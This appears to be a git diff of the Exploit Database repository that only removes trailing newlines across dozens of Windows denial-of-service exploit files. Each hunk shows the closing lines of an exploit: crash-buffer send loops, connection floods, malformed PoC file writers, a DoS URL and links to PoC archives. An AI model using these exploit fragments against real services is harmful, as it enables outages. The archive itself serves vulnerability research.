-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21123.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21123.zip \ No newline at end of file diff --git a/platforms/windows/dos/21131.txt b/platforms/windows/dos/21131.txt index 6b56bdb80..d9dc1574d 100755 --- a/platforms/windows/dos/21131.txt +++ b/platforms/windows/dos/21131.txt @@ -49,4 +49,4 @@ int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, PSTR szCmdLine, DispatchMessage(&msg); } return msg.wParam; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21143.pl b/platforms/windows/dos/21143.pl index 5b993a786..6537faa86 100755 --- a/platforms/windows/dos/21143.pl +++ b/platforms/windows/dos/21143.pl @@ -59,5 +59,4 @@ for($x=0;$x<$numpack;$x=$x+1){ }; }; -print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n"; - +print "\n\n\nSuccessfully sent ".$numpack." packets to ". $destination . "\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/21163.pl b/platforms/windows/dos/21163.pl index 2fdedcf79..ef27f9e3e 100755 --- a/platforms/windows/dos/21163.pl +++ b/platforms/windows/dos/21163.pl @@ -83,4 +83,4 @@ for( $i = 0; $i < $BUFF; $i++ ) { print "done.\n"; close( $sock ); -exit(); +exit(); \ No newline at end of file diff --git a/platforms/windows/dos/21172.pl b/platforms/windows/dos/21172.pl index 70f27c0ea..3570b0cb8 100755 --- a/platforms/windows/dos/21172.pl +++ b/platforms/windows/dos/21172.pl @@ -73,4 +73,4 @@ while($n > 0){ }); $nb->send;undef $nb;!$o{'L'}&&$n--; } -print"Finish!\n"; +print"Finish!\n"; \ No newline at end of file diff --git a/platforms/windows/dos/21228.c b/platforms/windows/dos/21228.c index 6cc88e859..55133b52b 100755 --- a/platforms/windows/dos/21228.c +++ b/platforms/windows/dos/21228.c @@ -99,4 +99,4 @@ for(j=0;j<5;j++) send(sd,msgtosnd,5024,0); } printf("\n\n BOOOOM"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21237.pl b/platforms/windows/dos/21237.pl index 856b50b3f..fe9eb7200 100755 --- a/platforms/windows/dos/21237.pl +++ b/platforms/windows/dos/21237.pl @@ -56,4 +56,4 @@ print S "$buf"; print("\nCrash was successful !\n\n"); -sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} +sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} \ No newline at end of file diff --git a/platforms/windows/dos/2124.php b/platforms/windows/dos/2124.php index c33f45a85..509326a36 100755 --- a/platforms/windows/dos/2124.php +++ b/platforms/windows/dos/2124.php @@ -41,4 +41,4 @@ while($data = @socket_read($socket,2046)) { //read the data ?> -# milw0rm.com [2006-08-07] +# milw0rm.com [2006-08-07] \ No newline at end of file diff --git a/platforms/windows/dos/21293.pl b/platforms/windows/dos/21293.pl index e04dc1062..91978ac4c 100755 --- a/platforms/windows/dos/21293.pl +++ b/platforms/windows/dos/21293.pl @@ -59,4 +59,4 @@ print S "$buf"; print("\nCrash was successful !\n\n"); -sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} +sub usage {die("\n\nUsage: perl -x $0 -s <server>\n\n");} \ No newline at end of file diff --git a/platforms/windows/dos/21305.c b/platforms/windows/dos/21305.c index 1d47052ce..70f9f9b14 100755 --- a/platforms/windows/dos/21305.c +++ b/platforms/windows/dos/21305.c @@ -109,4 +109,4 @@ printf("\nConnecting %s on port 21...\n\n", argv[1]); printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21306.c b/platforms/windows/dos/21306.c index 2b60f0590..51a23e681 100755 --- a/platforms/windows/dos/21306.c +++ b/platforms/windows/dos/21306.c @@ -107,4 +107,4 @@ int main(int argc, char *argv[]) printf("Try reconnect to %s\n", argv[1]); WSACleanup(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21346.html b/platforms/windows/dos/21346.html index ce5feb440..e37c8a8a1 100755 --- a/platforms/windows/dos/21346.html +++ b/platforms/windows/dos/21346.html @@ -25,5 +25,4 @@ crashme () <h3>IE Javascript Crash Test</h3> </center> </body> -</html> - +</html> \ No newline at end of file diff --git a/platforms/windows/dos/21388.c b/platforms/windows/dos/21388.c index 841f2b9a5..71c18f40e 100755 --- a/platforms/windows/dos/21388.c +++ b/platforms/windows/dos/21388.c @@ -156,4 +156,4 @@ unsigned long resolveTarget(char nstarget[]) } return *((unsigned long *) targetname->h_addr_list[0]); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/214.c b/platforms/windows/dos/214.c index f0a1dcbf4..fd5f4059e 100755 --- a/platforms/windows/dos/214.c +++ b/platforms/windows/dos/214.c @@ -166,4 +166,4 @@ int main(int argc, char *argv[]) } -// milw0rm.com [2000-12-02] +// milw0rm.com [2000-12-02] \ No newline at end of file diff --git a/platforms/windows/dos/21432.txt b/platforms/windows/dos/21432.txt index f31be49a7..12e6d25a1 100755 --- a/platforms/windows/dos/21432.txt +++ b/platforms/windows/dos/21432.txt @@ -12,5 +12,4 @@ The server must be restarted to regain normal functionality. This issue may be exploited with a web browser. For example: -http://target//aux%00 - +http://target//aux%00 \ No newline at end of file diff --git a/platforms/windows/dos/2147.pl b/platforms/windows/dos/2147.pl index 53f0b38cb..4d21d27ed 100755 --- a/platforms/windows/dos/2147.pl +++ b/platforms/windows/dos/2147.pl @@ -27,4 +27,4 @@ sub on_connect { $connect->add_handler('376', \&on_connect); $irc->start(); -# milw0rm.com [2006-08-08] +# milw0rm.com [2006-08-08] \ No newline at end of file diff --git a/platforms/windows/dos/21471.c b/platforms/windows/dos/21471.c index 166edb596..159ea6b95 100755 --- a/platforms/windows/dos/21471.c +++ b/platforms/windows/dos/21471.c @@ -90,4 +90,4 @@ void banner(void) printf("**************************************************\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21508.py b/platforms/windows/dos/21508.py index 3c281596e..cbf09335a 100755 --- a/platforms/windows/dos/21508.py +++ b/platforms/windows/dos/21508.py @@ -35,4 +35,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe sntlkeyssrvr+0xf89b: 0040f89b f3a6 repe cmps byte ptr [esi],byte ptr es:[edi] -""" +""" \ No newline at end of file diff --git a/platforms/windows/dos/21594.pl b/platforms/windows/dos/21594.pl index ccc95ebc7..516084411 100755 --- a/platforms/windows/dos/21594.pl +++ b/platforms/windows/dos/21594.pl @@ -28,4 +28,4 @@ print "altomo\@digitalgangsters.net\n"; print "Wait about a minute, and it should crash.\n"; print $socket "$sabre\r"; -close $socket; +close $socket; \ No newline at end of file diff --git a/platforms/windows/dos/2160.c b/platforms/windows/dos/2160.c index bc30eb7b2..00cc712a4 100755 --- a/platforms/windows/dos/2160.c +++ b/platforms/windows/dos/2160.c @@ -166,4 +166,4 @@ void std_err(void) { exit(1); } -// milw0rm.com [2006-08-10] +// milw0rm.com [2006-08-10] \ No newline at end of file diff --git a/platforms/windows/dos/21634.c b/platforms/windows/dos/21634.c index 0d24b63db..5eb9aad6e 100755 --- a/platforms/windows/dos/21634.c +++ b/platforms/windows/dos/21634.c @@ -53,4 +53,4 @@ int main(int argc, char **argv) { close(n); close(s); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21645.txt b/platforms/windows/dos/21645.txt index 4fbf1597b..a005492e2 100755 --- a/platforms/windows/dos/21645.txt +++ b/platforms/windows/dos/21645.txt @@ -73,4 +73,4 @@ Short Description: DivideByZero Recommended Bug Title: Integer Divide By Zero starting at FoxitReader_Lib_Full+0x0000000000158c8c (Hash=0x6461647c.0x64616453) ##################################################################### -Proof of concept .pdf included: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21645.pdf +Proof of concept .pdf included: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21645.pdf \ No newline at end of file diff --git a/platforms/windows/dos/21694.pl b/platforms/windows/dos/21694.pl index 1264a12a6..49e847678 100755 --- a/platforms/windows/dos/21694.pl +++ b/platforms/windows/dos/21694.pl @@ -51,4 +51,4 @@ foreach(1...$numc) { $t->print('localhost:23'); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21746.c b/platforms/windows/dos/21746.c index 600e67f9c..114427e86 100755 --- a/platforms/windows/dos/21746.c +++ b/platforms/windows/dos/21746.c @@ -916,4 +916,4 @@ main (int argc, char **argv) } return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21813.c b/platforms/windows/dos/21813.c index 1af12c35f..3e4c5e1d0 100755 --- a/platforms/windows/dos/21813.c +++ b/platforms/windows/dos/21813.c @@ -89,4 +89,4 @@ Connections\n\n"); sleep(100); WSACleanup(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21907.c b/platforms/windows/dos/21907.c index 0e4a55bb8..85cd28d15 100755 --- a/platforms/windows/dos/21907.c +++ b/platforms/windows/dos/21907.c @@ -43,4 +43,4 @@ void main() send(sock, DoS, sizeof(DoS), 0); closesocket(sock); WSACleanup(); - } + } \ No newline at end of file diff --git a/platforms/windows/dos/21908.pl b/platforms/windows/dos/21908.pl index f2d8df5f5..0b4f39f1d 100755 --- a/platforms/windows/dos/21908.pl +++ b/platforms/windows/dos/21908.pl @@ -56,5 +56,4 @@ print "Buffer has beens sended..."; close($sock); -exit; - +exit; \ No newline at end of file diff --git a/platforms/windows/dos/2194.pl b/platforms/windows/dos/2194.pl index 610dcd593..77a5a5b1d 100755 --- a/platforms/windows/dos/2194.pl +++ b/platforms/windows/dos/2194.pl @@ -201,4 +201,4 @@ close(PNG); print "Cya around,\nPreddy"; -# milw0rm.com [2006-08-16] +# milw0rm.com [2006-08-16] \ No newline at end of file diff --git a/platforms/windows/dos/21943.c b/platforms/windows/dos/21943.c index 8f486dd93..434099c34 100755 --- a/platforms/windows/dos/21943.c +++ b/platforms/windows/dos/21943.c @@ -238,4 +238,4 @@ main(int argc, char *argv[]) }while(childs--) wait(NULL); } - + \ No newline at end of file diff --git a/platforms/windows/dos/2195.html b/platforms/windows/dos/2195.html index 90b90853f..951b90562 100755 --- a/platforms/windows/dos/2195.html +++ b/platforms/windows/dos/2195.html @@ -62,4 +62,4 @@ while (disk < 20) </script> </body></html> -# milw0rm.com [2006-08-16] +# milw0rm.com [2006-08-16] \ No newline at end of file diff --git a/platforms/windows/dos/21952.c b/platforms/windows/dos/21952.c index 62ea7d48f..976bf5364 100755 --- a/platforms/windows/dos/21952.c +++ b/platforms/windows/dos/21952.c @@ -191,4 +191,4 @@ int main(int argc, char *argv[]) closesocket(s); WSACleanup(); return 0; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/21963.pl b/platforms/windows/dos/21963.pl index 0ce735842..2a0d33bc0 100755 --- a/platforms/windows/dos/21963.pl +++ b/platforms/windows/dos/21963.pl @@ -18,4 +18,4 @@ $portaddr = sockaddr_in($port, $ipaddr); send($socket, $buf, 0, $portaddr) == length($buf) or die "Can't send: $!\n"; print "Now, '$host' must be dead :)\n"; -#EOF +#EOF \ No newline at end of file diff --git a/platforms/windows/dos/21972.pl b/platforms/windows/dos/21972.pl index b47c4eeab..5fdc97da4 100755 --- a/platforms/windows/dos/21972.pl +++ b/platforms/windows/dos/21972.pl @@ -35,5 +35,4 @@ problems"); sleep 3; close(S); } else { die("Can't connect...\n"); } -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/21973.pl b/platforms/windows/dos/21973.pl index 5b298df99..bb848dd5f 100755 --- a/platforms/windows/dos/21973.pl +++ b/platforms/windows/dos/21973.pl @@ -24,5 +24,4 @@ PeerAddr=> "$ARGV[0]", PeerPort=>"25"); unless ($connect) { die "cant connect $ARGV [0]" } print $connect "$buffer"; -print "\nsending exploit......\n\n"; - +print "\nsending exploit......\n\n"; \ No newline at end of file diff --git a/platforms/windows/dos/21991.py b/platforms/windows/dos/21991.py index 5e6b227b2..012fe4321 100755 --- a/platforms/windows/dos/21991.py +++ b/platforms/windows/dos/21991.py @@ -22,4 +22,4 @@ for i in range(len(s1)): o.seek(s1[i][0], 0) o.write(s1[i][1]) -o.close() +o.close() \ No newline at end of file diff --git a/platforms/windows/dos/22.c b/platforms/windows/dos/22.c index 024a0924a..b487e48a1 100755 --- a/platforms/windows/dos/22.c +++ b/platforms/windows/dos/22.c @@ -97,4 +97,4 @@ void main(int argc,char *argv[]) } -// milw0rm.com [2003-04-29] +// milw0rm.com [2003-04-29] \ No newline at end of file diff --git a/platforms/windows/dos/2204.c b/platforms/windows/dos/2204.c index 143de82fb..03e8c13a9 100755 --- a/platforms/windows/dos/2204.c +++ b/platforms/windows/dos/2204.c @@ -214,4 +214,4 @@ fclose(winpng); printf("Evil PNG Created\nCya around,\nPreddy\n"); } -// milw0rm.com [2006-08-17] +// milw0rm.com [2006-08-17] \ No newline at end of file diff --git a/platforms/windows/dos/2208.html b/platforms/windows/dos/2208.html index 3790ff134..603e2b3da 100755 --- a/platforms/windows/dos/2208.html +++ b/platforms/windows/dos/2208.html @@ -29,4 +29,4 @@ while (A.length <= 51512*512) A+=A; allo.AllowScriptAccess = A; </script> -# milw0rm.com [2006-08-18] +# milw0rm.com [2006-08-18] \ No newline at end of file diff --git a/platforms/windows/dos/2210.c b/platforms/windows/dos/2210.c index f0e6769f2..97bc64fa5 100755 --- a/platforms/windows/dos/2210.c +++ b/platforms/windows/dos/2210.c @@ -199,4 +199,4 @@ int i = 0; return 0; } -// milw0rm.com [2006-08-18] +// milw0rm.com [2006-08-18] \ No newline at end of file diff --git a/platforms/windows/dos/22100.txt b/platforms/windows/dos/22100.txt index 2392a7ec7..778cef9a2 100755 --- a/platforms/windows/dos/22100.txt +++ b/platforms/windows/dos/22100.txt @@ -144,4 +144,4 @@ Currently, no solution is available for this issue. ################################################# -< http://0xffe4.org > +< http://0xffe4.org > \ No newline at end of file diff --git a/platforms/windows/dos/22121.pl b/platforms/windows/dos/22121.pl index fe101d70c..a74834829 100755 --- a/platforms/windows/dos/22121.pl +++ b/platforms/windows/dos/22121.pl @@ -20,4 +20,4 @@ print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22122.pl b/platforms/windows/dos/22122.pl index 577ba2c83..77284f839 100755 --- a/platforms/windows/dos/22122.pl +++ b/platforms/windows/dos/22122.pl @@ -20,4 +20,4 @@ print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22123.pl b/platforms/windows/dos/22123.pl index aedd36438..ce258f617 100755 --- a/platforms/windows/dos/22123.pl +++ b/platforms/windows/dos/22123.pl @@ -20,4 +20,4 @@ print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22124.pl b/platforms/windows/dos/22124.pl index db972487b..653690d3d 100755 --- a/platforms/windows/dos/22124.pl +++ b/platforms/windows/dos/22124.pl @@ -20,4 +20,4 @@ print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22154.pl b/platforms/windows/dos/22154.pl index d8a9e0947..11f319ad3 100755 --- a/platforms/windows/dos/22154.pl +++ b/platforms/windows/dos/22154.pl @@ -2054,4 +2054,4 @@ my $poc = "\x86\x63\x50\x69\x1A\x99\xA7\x1B\x27\x89\x8C\x1B\x80\x79\xE3\x47\xED\x26\x80\x8B\x9A\xE1\xFC\x11\x11". open(C, ">:raw", "poc.3GP"); print C $poc; -close(C); +close(C); \ No newline at end of file diff --git a/platforms/windows/dos/22214.pl b/platforms/windows/dos/22214.pl index b2911487c..13aacc4e7 100755 --- a/platforms/windows/dos/22214.pl +++ b/platforms/windows/dos/22214.pl @@ -166,4 +166,4 @@ my $poc = "\xDD\xDD\xD6\xA4\xF5\xE0\x0D". open(C, ">:raw", "poc.mov"); print C $poc; -close(C); +close(C); \ No newline at end of file diff --git a/platforms/windows/dos/22215.txt b/platforms/windows/dos/22215.txt index 9d06753e1..5363e3d4e 100755 --- a/platforms/windows/dos/22215.txt +++ b/platforms/windows/dos/22215.txt @@ -127,4 +127,4 @@ Recommended Bug Title: Stack Overflow starting at wwlib+0x000000000000458e (Hash Proof of concept poc.doc included. Exploit-DB Note: This also works on Word 2007 -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22215.tar.gz +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22215.tar.gz \ No newline at end of file diff --git a/platforms/windows/dos/22220.pl b/platforms/windows/dos/22220.pl index 888e11495..614d30f6a 100755 --- a/platforms/windows/dos/22220.pl +++ b/platforms/windows/dos/22220.pl @@ -41,4 +41,4 @@ print "Attacking..."; print $client "$buf"; print "OK\n"; close($client); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22290.c b/platforms/windows/dos/22290.c index e395d2ec4..f2af6ef12 100755 --- a/platforms/windows/dos/22290.c +++ b/platforms/windows/dos/22290.c @@ -130,4 +130,4 @@ int bf1942_rcon_connect(char *servername, int serverport, char *user, char else rval=-1; // auth-error return rval; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22302.rb b/platforms/windows/dos/22302.rb index cc00a3c64..4c48b484e 100755 --- a/platforms/windows/dos/22302.rb +++ b/platforms/windows/dos/22302.rb @@ -32,4 +32,4 @@ while resp = s.gets p resp end -s.close +s.close \ No newline at end of file diff --git a/platforms/windows/dos/22310.txt b/platforms/windows/dos/22310.txt index 6998f6d86..55ec51d52 100755 --- a/platforms/windows/dos/22310.txt +++ b/platforms/windows/dos/22310.txt @@ -115,5 +115,4 @@ later write. ################################################################################ Proof of concept included. http://www31.zippyshare.com/v/29089672/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22310.rar - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22310.rar \ No newline at end of file diff --git a/platforms/windows/dos/22330.txt b/platforms/windows/dos/22330.txt index c3de73bc7..aa85492e1 100755 --- a/platforms/windows/dos/22330.txt +++ b/platforms/windows/dos/22330.txt @@ -33,5 +33,4 @@ Excel!Ordinal40+0x1ce0d0: Proof of concept included. http://www36.zippyshare.com/v/48422905/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22330.rar - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22330.rar \ No newline at end of file diff --git a/platforms/windows/dos/2238.html b/platforms/windows/dos/2238.html index 39f5c479f..c680c52be 100755 --- a/platforms/windows/dos/2238.html +++ b/platforms/windows/dos/2238.html @@ -85,4 +85,4 @@ window.status = "failed!"; </body> </html> -# milw0rm.com [2006-08-21] +# milw0rm.com [2006-08-21] \ No newline at end of file diff --git a/platforms/windows/dos/22397.txt b/platforms/windows/dos/22397.txt index 95a93d565..816d37f69 100755 --- a/platforms/windows/dos/22397.txt +++ b/platforms/windows/dos/22397.txt @@ -45,4 +45,4 @@ This allows an attacker to write arbitrary data within the application, leading Remediation For customers of SiPass integrated MP2.4, MP2.5 and MP2.6, Siemens provides a software hotfix that fixes the vulnerability. Please contact customer support to acquire this hotfix. Siemens recommends that customers with earlier versions of SiPass integrated upgrade to one of the above versions. To acquire the software hotfix for SiPass integrated, please contact customer support at: -sp.support.de@siemens.com +sp.support.de@siemens.com \ No newline at end of file diff --git a/platforms/windows/dos/22401.php b/platforms/windows/dos/22401.php index dbcc76488..ec3b894a5 100755 --- a/platforms/windows/dos/22401.php +++ b/platforms/windows/dos/22401.php @@ -37,4 +37,4 @@ for($i = 0; $i < 60; $i++) /* http://0xffe4.org */ -?> +?> \ No newline at end of file diff --git a/platforms/windows/dos/22402.txt b/platforms/windows/dos/22402.txt index c16a3b4a2..de5d39219 100755 --- a/platforms/windows/dos/22402.txt +++ b/platforms/windows/dos/22402.txt @@ -57,4 +57,4 @@ User mode write access violations that are not near NULL are exploitable. Proof of concept included. http://www21.zippyshare.com/v/83302158/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22402.rar \ No newline at end of file diff --git a/platforms/windows/dos/22417.py b/platforms/windows/dos/22417.py index fe3a61e97..81aa4fd12 100755 --- a/platforms/windows/dos/22417.py +++ b/platforms/windows/dos/22417.py @@ -27,4 +27,4 @@ def g(): fd.close() -g() +g() \ No newline at end of file diff --git a/platforms/windows/dos/2245.pl b/platforms/windows/dos/2245.pl index 6d323dac5..aba3bdcf5 100755 --- a/platforms/windows/dos/2245.pl +++ b/platforms/windows/dos/2245.pl @@ -37,4 +37,4 @@ for ($x = 0 ; $x < 12 ; $x++) print $var; sleep(2); -# milw0rm.com [2006-08-22] +# milw0rm.com [2006-08-22] \ No newline at end of file diff --git a/platforms/windows/dos/22460.txt b/platforms/windows/dos/22460.txt index 261bb6641..7efdcfc70 100755 --- a/platforms/windows/dos/22460.txt +++ b/platforms/windows/dos/22460.txt @@ -6,5 +6,4 @@ GET / HTTP/1.0 Connection: GET / HTTP/1.0 -Range: - +Range: \ No newline at end of file diff --git a/platforms/windows/dos/22464.txt b/platforms/windows/dos/22464.txt index 9cf537034..1f0c85c26 100755 --- a/platforms/windows/dos/22464.txt +++ b/platforms/windows/dos/22464.txt @@ -37,4 +37,4 @@ ntdll!RtlEnterCriticalSection+0x8: Proof of concept included. http://www42.zippyshare.com/v/23669551/file.html -Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf +Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22464.pdf \ No newline at end of file diff --git a/platforms/windows/dos/22467.txt b/platforms/windows/dos/22467.txt index 7fa1b66a3..d8858f157 100755 --- a/platforms/windows/dos/22467.txt +++ b/platforms/windows/dos/22467.txt @@ -52,4 +52,4 @@ int dll_hijack() } # -# Enjoys! +# Enjoys! \ No newline at end of file diff --git a/platforms/windows/dos/22516.pl b/platforms/windows/dos/22516.pl index 28f34f76c..8836baf6b 100755 --- a/platforms/windows/dos/22516.pl +++ b/platforms/windows/dos/22516.pl @@ -108,6 +108,4 @@ sub usage print "\n.:.:.:.:.:.:.:.:.:.:.:."; print "\ncrash was successful ~!\n"; -print "\.:.:.:.:.:.:.:.:.:.:.:.\n"; - - +print "\.:.:.:.:.:.:.:.:.:.:.:.\n"; \ No newline at end of file diff --git a/platforms/windows/dos/22551.pl b/platforms/windows/dos/22551.pl index 494867af2..dedb40e3b 100755 --- a/platforms/windows/dos/22551.pl +++ b/platforms/windows/dos/22551.pl @@ -47,5 +47,4 @@ while ($client = $server->accept()) print $client "$buf"; print "OK\n"; close($client); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/22568.pl b/platforms/windows/dos/22568.pl index bcb52dc1b..cfb46bf0f 100755 --- a/platforms/windows/dos/22568.pl +++ b/platforms/windows/dos/22568.pl @@ -54,5 +54,4 @@ $resp = <$sock>; print $sock "\r\n"; print $sock "\r\n\r\n\r\n\r\n\r\n\r\n"; -close($sock); - +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/22569.pl b/platforms/windows/dos/22569.pl index 67cd3a706..65ab51733 100755 --- a/platforms/windows/dos/22569.pl +++ b/platforms/windows/dos/22569.pl @@ -54,5 +54,4 @@ $resp = <$sock>; print $sock "\r\n"; print $sock "\r\n\r\n\r\n\r\n\r\n\r\n"; -close($sock); - +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/22576.txt b/platforms/windows/dos/22576.txt index 446d1e45d..0be78fa9f 100755 --- a/platforms/windows/dos/22576.txt +++ b/platforms/windows/dos/22576.txt @@ -9,4 +9,4 @@ or select * from Openquery(SomeJet40LinkedServer,'Select XXX...()') -(where XXX... is more than 276 chars) +(where XXX... is more than 276 chars) \ No newline at end of file diff --git a/platforms/windows/dos/22581.pl b/platforms/windows/dos/22581.pl index ffd485a1c..7b63951db 100755 --- a/platforms/windows/dos/22581.pl +++ b/platforms/windows/dos/22581.pl @@ -55,4 +55,4 @@ $resp = <$sock>; print $sock "\r\n"; print $sock "\r\n\r\n\r\n\r\n\r\n\r\n"; -close($sock); +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/22582.pl b/platforms/windows/dos/22582.pl index 7453ac911..0d507e96e 100755 --- a/platforms/windows/dos/22582.pl +++ b/platforms/windows/dos/22582.pl @@ -55,4 +55,4 @@ $resp = <$sock>; print $sock "\r\n"; print $sock "\r\n\r\n\r\n\r\n\r\n\r\n"; -close($sock); +close($sock); \ No newline at end of file diff --git a/platforms/windows/dos/22585.pl b/platforms/windows/dos/22585.pl index 2898e0c6a..387d0c26a 100755 --- a/platforms/windows/dos/22585.pl +++ b/platforms/windows/dos/22585.pl @@ -22,4 +22,4 @@ print "\r\nBeginning probe -- stop with CTRL+C\r\n"; while (1) { $f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host:$port"); undef $f; -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22586.c b/platforms/windows/dos/22586.c index b65732e96..c9d436904 100755 --- a/platforms/windows/dos/22586.c +++ b/platforms/windows/dos/22586.c @@ -51,5 +51,4 @@ int main(int argc, char *argv[]) if ((send(fd, buf, 2000, 0))<0) break; } -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/22587.c b/platforms/windows/dos/22587.c index 17320e5ab..73441cb54 100755 --- a/platforms/windows/dos/22587.c +++ b/platforms/windows/dos/22587.c @@ -86,5 +86,4 @@ void addr_initialize (struct sockaddr_in *address, int port, long IPaddr) address -> sin_addr.s_addr = IPaddr; } -/*EOF*/ - +/*EOF*/ \ No newline at end of file diff --git a/platforms/windows/dos/22591.txt b/platforms/windows/dos/22591.txt index 0d711098d..53b954b0b 100755 --- a/platforms/windows/dos/22591.txt +++ b/platforms/windows/dos/22591.txt @@ -122,4 +122,4 @@ Instruction Address: 0x00000000302d68ca Proof of concept included. http://www19.zippyshare.com/v/5620945/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22591.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22591.rar \ No newline at end of file diff --git a/platforms/windows/dos/22637.pl b/platforms/windows/dos/22637.pl index e742a0446..7b9c68014 100755 --- a/platforms/windows/dos/22637.pl +++ b/platforms/windows/dos/22637.pl @@ -16,5 +16,4 @@ while ($client = $server->accept()) { print "OK"; print $client "$buf\n"; close($client); -} - +} \ No newline at end of file diff --git a/platforms/windows/dos/22653.py b/platforms/windows/dos/22653.py index 70c0118e3..1bd62042d 100755 --- a/platforms/windows/dos/22653.py +++ b/platforms/windows/dos/22653.py @@ -19,4 +19,4 @@ file.close() The trick is by adding 49 bytes of malicious byte (represent with \x41) into the .dll file, right after the PE (\x50\x45) header on the 244th byte -of the file. +of the file. \ No newline at end of file diff --git a/platforms/windows/dos/22655.txt b/platforms/windows/dos/22655.txt index 4c7ab7f27..444819db3 100755 --- a/platforms/windows/dos/22655.txt +++ b/platforms/windows/dos/22655.txt @@ -32,4 +32,4 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210246 Proof of concept included. http://www37.zippyshare.com/v/79789962/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22655.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22655.rar \ No newline at end of file diff --git a/platforms/windows/dos/22670.c b/platforms/windows/dos/22670.c index 48fb2cbb4..a5cfaf4bc 100755 --- a/platforms/windows/dos/22670.c +++ b/platforms/windows/dos/22670.c @@ -171,4 +171,4 @@ void usage() printf("IIS eXploit. by velan. Greetz to: Shashank Pandey a.k.a +(Neo1)+\n"); printf("Usage\r\n"); printf("Screw_IIS <victim IP>\n"); -} +} \ No newline at end of file diff --git a/platforms/windows/dos/22679.txt b/platforms/windows/dos/22679.txt index eb5db506d..d359b922b 100755 --- a/platforms/windows/dos/22679.txt +++ b/platforms/windows/dos/22679.txt @@ -70,5 +70,4 @@ VISLIB!Ordinal1+0x28f325 Proof of concept included. http://www24.zippyshare.com/v/85134950/file.html -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22679.rar - +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22679.rar \ No newline at end of file diff --git a/platforms/windows/dos/22680.txt b/platforms/windows/dos/22680.txt index 10942f4af..7a05b2af1 100755 --- a/platforms/windows/dos/22680.txt +++ b/platforms/windows/dos/22680.txt @@ -56,4 +56,4 @@ a heap-based buffer overflow via a specially crafted BMP image containing many ============= http://protekresearchlab.com/exploits/PRL-2012-32.rle -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz) \ No newline at end of file diff --git a/platforms/windows/dos/22681.txt b/platforms/windows/dos/22681.txt index cd4f31559..8516c8c07 100755 --- a/platforms/windows/dos/22681.txt +++ b/platforms/windows/dos/22681.txt @@ -55,5 +55,4 @@ heap-based buffer overflow via a specially crafted "ImageWidth" value. ============= 